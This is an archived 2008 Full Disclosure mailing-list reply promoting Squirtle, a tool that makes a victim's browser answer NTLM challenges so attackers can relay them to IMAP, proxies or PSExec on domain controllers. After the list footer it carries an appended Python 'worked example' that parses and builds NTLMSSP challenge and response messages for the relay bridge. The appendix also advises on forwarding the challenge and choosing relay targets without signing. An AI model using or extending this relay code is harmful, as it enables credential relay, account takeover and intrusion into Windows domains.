Full Disclosure mailing list archives

Re: NTLM Multiprotocol Replay attacks


From: Kurt Grutzmacher <grutz () jingojango net>
Date: Sat, 15 Nov 2008 16:26:57 -0600

On Fri, Nov 14, 2008 at 09:37:46PM +0100, Andres Tarasco wrote:
> I have published a new proof of concept tool, named "Smbrelay3", that is
> able to replay NTLM authentication from several protocols like
> SMB/HTTP/IMAP/..
> http://www.tarasco.org/security/smbrelay/index.html

Great little tool from you guys! It's probably about time that I told
FullDisc about Squirtle since releasing it at this year's DefCon.

  http://squirtle.googlecode.com/

What's Squirtle? It's simply an authentication bridge that controls a
browser to allow an attacker to request NTLM authentication at any time
as long as their browser is running with the Squirtle Javascript. "Evil
Agents" begin their authentication requests against different servers or
workstations, pass Squirtle a session ID and the relevant details to
complete authentication (flags, nonce, server, domain, etc) and wait for 
the Type 3 response.

I've dubbed this attack "Pass The Dutchie" since we're using an already 
rolled group of hashes and are ready to pass them around to our friends.

Current "Evil Agent" support I've written:

 - NTLMAPS - HTTP proxy w/ NTLM support (plus pass-the-hash enabled)
 - IMAP Mirror - Download all IMAP folders of a victim
 - Metasploit 3.2 - PSExec against domain controllers? Yeah!

Per HD's blog post and your source code comment, MS08-068 only limits an
attacker from attempting to connect back to the user's workstation where
authentication began. Not a problem for Squirtle since you can attack
anything the victim has access to. Domain Admin clicked that link? Yeah,
the game is over.

If the DeepSec videos are published by Help Net Security you will see the
latest talk on Squirtle/NTLM SSO and view the demo attacks. I'll put
some video examples of Squirtle up before the end of the week.

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
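The handshake the message describes, as an added worked example (this is not Squirtle's or Smbrelay3's code): an "Evil Agent" opens a session against a target, receives the NTLMSSP Type 2 (CHALLENGE) message, and hands the bridge the pieces it needs to store per session (server, target domain, flags, the 8-byte nonce); the victim's browser answers with a Type 3 (AUTHENTICATE) that the agent forwards unchanged. The code below parses and re-emits both messages following the MS-NLMP field layout. The sample names and values (CORP, FILESRV, jdoe, WS01, the nonce bytes) are constructed for the example.

```python
"""Dissect and re-emit the NTLMSSP Type 2 / Type 3 messages that cross an
authentication bridge. Layout per MS-NLMP; sample values are constructed."""
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
CHALLENGE, AUTHENTICATE = 2, 3

# NegotiateFlags bits (MS-NLMP 2.2.2.5) an agent checks before replaying.
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_SIGN = 0x00000010
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_ALWAYS_SIGN = 0x00008000
NEGOTIATE_TARGET_INFO = 0x00800000

# AvId values inside TargetInfo (MS-NLMP 2.2.2.1); AvId 0 terminates the list.
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer", 4: "dns_domain", 5: "dns_tree"}


def _read_buf(msg, at):
    """Resolve an 8-byte security buffer (Len, MaxLen, Offset) to its payload."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
    if offset + length > len(msg):
        raise ValueError("security buffer points outside the message")
    return msg[offset:offset + length]


def _parse_av_pairs(blob):
    """Walk AV_PAIRs (AvId:2, AvLen:2, Value) until MsvAvEOL."""
    out, pos = {}, 0
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        if av_id in AV_NAMES:
            out[AV_NAMES[av_id]] = blob[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return out


def parse_type2(msg):
    """Pull out of a CHALLENGE_MESSAGE what the bridge must keep per session."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != CHALLENGE:
        raise ValueError("not an NTLMSSP Type 2 message")
    flags = struct.unpack_from("<I", msg, 20)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    info = _parse_av_pairs(_read_buf(msg, 40)) if flags & NEGOTIATE_TARGET_INFO else {}
    return {
        "target": _read_buf(msg, 12).decode(enc),
        "flags": flags,
        "nonce": msg[24:32],  # ServerChallenge: binds the victim's Type 3 to this server
        "target_info": info,
        # A target that negotiated signing cannot be driven with a relayed Type 3
        # alone: the session key is derived from the user's NT hash, which we lack.
        "signing_negotiated": bool(flags & (NEGOTIATE_SIGN | NEGOTIATE_ALWAYS_SIGN)),
    }


def build_type2(target, flags, nonce, target_info):
    """Serialize a CHALLENGE_MESSAGE; target_info maps AvId -> string."""
    assert len(nonce) == 8, "ServerChallenge is exactly 8 bytes"
    name = target.encode("utf-16-le")
    pairs = b"".join(struct.pack("<HH", i, len(v.encode("utf-16-le"))) + v.encode("utf-16-le")
                     for i, v in target_info.items()) + struct.pack("<HH", 0, 0)
    hdr = 56  # fixed part, including the zeroed 8-byte Version field
    return (NTLMSSP_SIG + struct.pack("<I", CHALLENGE)
            + struct.pack("<HHI", len(name), len(name), hdr)
            + struct.pack("<I", flags | NEGOTIATE_UNICODE | NEGOTIATE_TARGET_INFO)
            + nonce + b"\x00" * 8
            + struct.pack("<HHI", len(pairs), len(pairs), hdr + len(name))
            + b"\x00" * 8 + name + pairs)


def build_type3(domain, user, workstation, lm_resp, nt_resp, flags):
    """Serialize an AUTHENTICATE_MESSAGE (empty session key, zeroed Version and MIC)."""
    payload = [lm_resp, nt_resp] + [s.encode("utf-16-le") for s in (domain, user, workstation)] + [b""]
    fields, off = b"", 88  # fixed part incl. NegotiateFlags, Version (8) and MIC (16)
    for p in payload:
        fields += struct.pack("<HHI", len(p), len(p), off)
        off += len(p)
    return (NTLMSSP_SIG + struct.pack("<I", AUTHENTICATE) + fields
            + struct.pack("<I", flags | NEGOTIATE_UNICODE) + b"\x00" * 24 + b"".join(payload))


def parse_type3(msg):
    """Extract identity and the NT response the bridge forwards to the target."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        raise ValueError("not an NTLMSSP Type 3 message")
    # Very old clients omit NegotiateFlags; detect that from the first payload offset.
    first = min(struct.unpack_from("<I", msg, at + 4)[0] for at in (12, 20, 28, 36, 44))
    flags = struct.unpack_from("<I", msg, 60)[0] if first >= 64 else 0
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    nt_resp = _read_buf(msg, 20)
    return {
        "domain": _read_buf(msg, 28).decode(enc),
        "user": _read_buf(msg, 36).decode(enc),
        "workstation": _read_buf(msg, 44).decode(enc),
        "lm_response": _read_buf(msg, 12),
        "nt_proof": nt_resp[:16],    # NTProofStr: HMAC-MD5 over ServerChallenge + client blob
        "nt_blob": nt_resp[16:],     # NTLMv2_CLIENT_CHALLENGE (timestamp, client nonce, TargetInfo copy)
        "ntlmv2": len(nt_resp) > 24,  # a plain NTLMv1 NT response is exactly 24 bytes
    }
```

The agent stores the dict from parse_type2 under its session ID and forwards the raw Type 2 bytes to the victim's browser as-is: the ServerChallenge must reach the client untouched or the Type 3 will not verify at the target. The flags are worth keeping for target selection, since a server that negotiated signing will reject a relayed session whose key the agent cannot compute.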
